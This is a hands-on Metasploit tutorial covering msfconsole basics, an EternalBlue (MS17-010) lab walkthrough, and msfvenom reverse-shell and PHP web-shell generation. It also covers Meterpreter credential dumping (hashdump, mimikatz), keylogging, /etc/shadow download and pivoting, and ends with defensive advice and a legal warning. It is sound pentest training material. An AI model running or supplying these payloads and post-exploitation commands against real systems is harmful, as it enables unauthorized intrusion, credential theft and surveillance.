Metasploit Framework is the open-source offensive framework that pentesters and red teamers worldwide use as a common language. From vulnerability validation to exploit execution, payload generation, and post-exploitation, the entire flow is driven from a single interface. This article is built around one goal: making you actually able to use the tool. Commands and hands-on practice are the focus.
What Metasploit is #
Metasploit Framework is an open-source offensive framework used for penetration testing and vulnerability validation. The core value is not "write an exploit from scratch every time" but the ability to invoke known exploits / payloads / post-modules from a unified interface.
Bundled by default in Kali Linux and Parrot OS, and a required practical skill in certifications like OSCP and CEH, it is the de facto "first offensive tool you ever touch".
Started in 2003 by HD Moore in Perl → fully rewritten in Ruby in v3.0 (2007) → acquired by Rapid7 in 2009 and actively developed ever since.
What it can do #
- Vulnerability scanning (auxiliary modules)
- Exploitation of known CVEs (thousands of exploit modules)
- Payload generation (msfvenom — exe / elf / php / shellcode and more)
- Post-exploitation (info gathering, lateral movement, privilege escalation via Meterpreter)
- Listener / handler (catching reverse connections)
Launch and database initialization #
On Kali it's preinstalled. Initialize the database once on first use and you unlock the result-management commands hosts / services / vulns later on.
$ sudo msfdb init # start PostgreSQL + create DB (first time only)
$ msfconsole # launch the interactive shell
=[ metasploit v6.x.x-dev ]
+ -- --=[ 2300+ exploits - 1200+ auxiliary - 410+ post ]
+ -- --=[ 950+ payloads - 45+ encoders - 11+ nops ]
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.help for the built-in command list, search to find modules, and use to select one. These three already cover most of what you need.
The basic workflow (five steps) #
Just about every Metasploit-driven attack fits into the same five-step shape.
db_nmap stores results directly in the msf database.search to find an exploit matching the CVE or service.use the module → show options → set RHOSTS / LHOST / PAYLOAD.check first to confirm the vulnerability is present, then exploit. Session acquired.The module hierarchy #
Every capability is packaged as a "module". They live in a tree under /usr/share/metasploit-framework/modules/.
| Type | Role | Representative example |
|---|---|---|
| exploit | Abuse a vulnerability to gain code execution | exploit/windows/smb/ms17_010_eternalblue |
| auxiliary | Helpers — scanning, brute force, listeners | auxiliary/scanner/portscan/tcp |
| payload | Code that runs on the target after a successful exploit | windows/x64/meterpreter/reverse_tcp |
| post | Post-exploitation automation (recon / lateral / persistence) | post/multi/recon/local_exploit_suggester |
| encoder | Transform shellcode to evade static signatures | x86/shikata_ga_nai |
| evasion | Generate executables with AV-evasion built in | windows/windows_defender_exe |
The three payload structures #
- single (inline) — one self-contained binary. Big, but stable.
- stager — a tiny stub that downloads the real payload over the network. Useful when the exploit has tight buffer constraints.
- stage — the real payload that the stager loads. Meterpreter works through this mechanism.
Essential msfconsole commands #
The minimum set worth committing to memory. These cover roughly 95% of day-to-day usage.
# search
msf6 > search ms17_010
msf6 > search type:exploit platform:windows
# module selection (the index from search results also works)
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > use 0
msf6 > back # go back one level
# inspect
msf6 > info
msf6 > show options
msf6 > show payloads
msf6 > show targets
# parameter setting
msf6 > set RHOSTS 192.168.56.50
msf6 > set LHOST eth0 # interface name is accepted
msf6 > setg LHOST 10.0.2.4 # global setting (applies to all modules)
# execute
msf6 > check # pre-flight the vulnerability
msf6 > exploit
msf6 > exploit -j -z # run in background
msf6 > run # synonym for exploitmsf6 > sessions -l # list
msf6 > sessions -i 1 # attach to ID=1
meterpreter > background # Ctrl+Z also works, returns to console
msf6 > sessions -K # kill all sessions
msf6 > jobs -l
msf6 > jobs -Kmsf6 > workspace -a redteam # create a workspace
msf6 > db_nmap -sS 192.168.56.0/24
msf6 > hosts # discovered hosts
msf6 > services # discovered services
msf6 > vulns # candidate vulnerabilities
msf6 > loot # collected filesHands-on — EternalBlue (MS17-010) #
The SMB v1 vulnerability used by the 2017 WannaCry ransomware. Unpatched Windows 7 and Server 2008 R2 boxes are sitting ducks, making this a classic exercise — featured in HackTheBox Blue and the OSCP labs.
STEP 1 — Reconnaissance #
$ nmap -p 445 --script smb-vuln-ms17-010 192.168.56.50
PORT STATE SERVICE
445/tcp open microsoft-ds
| smb-vuln-ms17-010:
| VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)STEP 2 — Module search #
msf6 > search ms17_010
Matching Modules
# Name
0 exploit/windows/smb/ms17_010_eternalblue
1 exploit/windows/smb/ms17_010_psexec
2 auxiliary/scanner/smb/smb_ms17_010STEP 3 — Configure + check #
msf6 > use 0
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.56.50
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.56.106
msf6 exploit(ms17_010_eternalblue) > check
[+] 192.168.56.50:445 - Host is likely VULNERABLE to MS17-010!STEP 4 — Execute #
msf6 exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.56.106:4444
[*] 192.168.56.50:445 - ...exploitation successful...
[*] Sending stage (200774 bytes) to 192.168.56.50
[*] Meterpreter session 1 opened
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM # SYSTEM in one shot
meterpreter > sysinfo
Computer : DC01
OS : Windows 7 (6.1 Build 7601, SP1)
Architecture: x64The SMB service runs in the kernel (srv.sys). Since the exploit targets a vulnerability in the SMB driver itself, the shellcode runs with SYSTEM privileges from the very first instruction. Unlike userland exploits, there is no follow-up privilege-escalation step needed.
Payload generation with msfvenom #
A standalone payload-generation tool. Use it when you want to produce an exe / elf / php / shellcode locally and deliver it through another channel — file upload, email attachment, USB, and so on.
Key options #
-p <payload>— payload nameLHOST=/LPORT=— reverse-connection destination (use=, notset)-f <format>— output format (exe/elf/raw/php/c, etc.)-e <encoder>/-i <count>— encoder + number of iterations-b '\x00\x0a\x0d'— exclude bad chars-o <file>— output destination
Common combinations #
# Windows Meterpreter exe
$ msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.56.106 LPORT=4444 \
-f exe -o shell.exe
# Linux ELF
$ msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.56.106 LPORT=4444 \
-f elf -o shell.elf
# PHP web shell
$ msfvenom -p php/meterpreter/reverse_tcp \
LHOST=192.168.56.106 LPORT=4444 \
-f raw -o shell.php
# C shellcode (for BoF experiments, with bad chars excluded)
$ msfvenom -p linux/x86/shell_reverse_tcp \
LHOST=192.168.56.106 LPORT=4444 \
-b '\x00\x0a\x0d' -f cThe receiver side — multi/handler #
To catch the reverse connection from a generated payload, stand up multi/handler.
msf6 > use exploit/multi/handler
msf6 exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(handler) > set LHOST 192.168.56.106
msf6 exploit(handler) > set LPORT 4444
msf6 exploit(handler) > exploit -j # listen in backgroundEncoders like shikata_ga_nai only defeat static signatures. Modern EDR catches binaries via behavioral analysis, sandboxing, and memory scanning, so anything msfvenom generates directly should be treated as "will be detected immediately".
Meterpreter #
Meterpreter is Metasploit's signature payload. It is memory-resident, uses encrypted communications, runs cross-platform, and supports dynamic module loading. Because it never drops a binary on disk it is harder for AV to see, and feature-wise it is in a different league from a raw reverse shell.
Frequently used commands #
meterpreter > sysinfo # OS / architecture
meterpreter > getuid # current user
meterpreter > ps # process list
# Windows privilege escalation
meterpreter > getsystem # attempt elevation to SYSTEM
meterpreter > hashdump # dump SAM hashes (requires SYSTEM)
meterpreter > load kiwi # load mimikatz functionality
meterpreter > kiwi_cmd "sekurlsa::logonpasswords"meterpreter > download /etc/shadow
meterpreter > upload payload.exe C:\\Windows\\Temp\\
meterpreter > migrate 1234 # jump to another process (evasion / privilege change)
meterpreter > screenshot # capture the screen
meterpreter > keyscan_start # start keylogger
meterpreter > keyscan_dump
meterpreter > shell # spawn a native cmd / shPivoting — into the internal network #
Using a compromised host as a stepping stone, you can route scans and exploits into internal IP segments that would otherwise be unreachable.
meterpreter > run autoroute -s 10.0.0.0/24
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(tcp) > set RHOSTS 10.0.0.5
msf6 auxiliary(tcp) > run # scan 10.0.0.5 through the compromised hostThe defender's perspective and ethics #
Metasploit is an offensive tool, but it is equally a validation tool for "does this actually work against my environment?". Required reading for blue teams too.
What the defender should do #
- Don't sit on known CVEs — most Metasploit exploits target known CVEs, and patching kills most of them.
- Keep EDR current — Meterpreter's reflective DLL injection is detectable by modern EDR.
- Disable SMBv1 / LLMNR / NetBIOS — these are the breeding ground for EternalBlue and Responder-style attacks.
- LAPS / JIT administration — block lateral movement that relies on reused passwords.
- Centralize logs in SIEM — detect anomalous PowerShell, new processes, and unusual SMB access.
Running Metasploit against systems you don't own, without permission, is a crime. In Japan this falls under the Unauthorized Computer Access Act and the Penal Code (obstruction of business by damaging electronic computers).
Use is limited to:
- Environments you own (home LAN / self-built VMs / HackTheBox / VulnHub)
- Penetration tests with written authorization (a signed contract with the client)
- CTFs (only where the organizer has explicitly authorized attacks)
"I just want to try a PoC", "on my friend's server", "on a coworker's PC" — all unacceptable.
Summary #
- Metasploit moves in five steps: discover → select → configure → execute → post
- The main UI is msfconsole, standalone payloads come from msfvenom, results are managed by msfdb
- Meterpreter is a memory-resident stealth shell;
migrate/hashdump/autorouteare the post-exploitation workhorses - In the EDR era, assume raw msfvenom output gets detected; serious evasion is the domain of other frameworks (Sliver, Cobalt Strike, etc.)
- Use it only on authorized environments — if you can't honor that rule, don't touch it